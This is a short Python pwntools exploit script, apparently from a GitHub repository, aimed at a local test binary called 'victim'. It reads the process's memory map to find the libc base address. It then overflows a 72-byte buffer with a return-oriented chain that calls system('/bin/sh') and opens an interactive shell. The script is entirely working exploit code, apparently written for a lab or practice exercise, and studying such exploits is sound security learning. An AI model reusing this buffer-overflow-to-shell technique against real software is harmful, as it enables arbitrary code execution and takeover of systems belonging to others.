Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 37 lines (26 sloc) 1.02 KB
#!/usr/bin/env python
from pwn import *
import binascii
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process('./victim')
gadget_offset = 0x21102
system_offset = libc.symbols['system']
buf_addr_str = p.recvuntil('\n')
buf_addr = int(buf_addr_str, 16)
pid=os.popen("ps aux | grep victim | sed -n 1p | awk '{ print $2 }'").read().strip('\n')
cmd = "cat /proc/"+str(pid)+"/maps | grep libc | grep \"xp\" | awk -F \"-\" '{ print $1 }'"
libc_addr = int(os.popen(cmd).read(), 16)
gadget_addr = libc_addr + gadget_offset
system_addr = libc_addr + system_offset
binsh_addr = buf_addr + 64 + 8 + 24
print "gadget_offset : " + hex(gadget_offset)
print "system_offset : " + hex(system_offset)
print "buf_addr : " + hex(buf_addr)
print "libc_addr : " + hex(libc_addr)
print "gadget_addr : " + hex(gadget_addr)
print "system_addr : " + hex(system_addr)
print "binsh_addr : " + hex(binsh_addr)
p.recv()
payload = "\x00"*72 + p64(gadget_addr) + p64(binsh_addr) + p64(system_addr) + "/bin/sh"
p.send(payload)
p.interactive()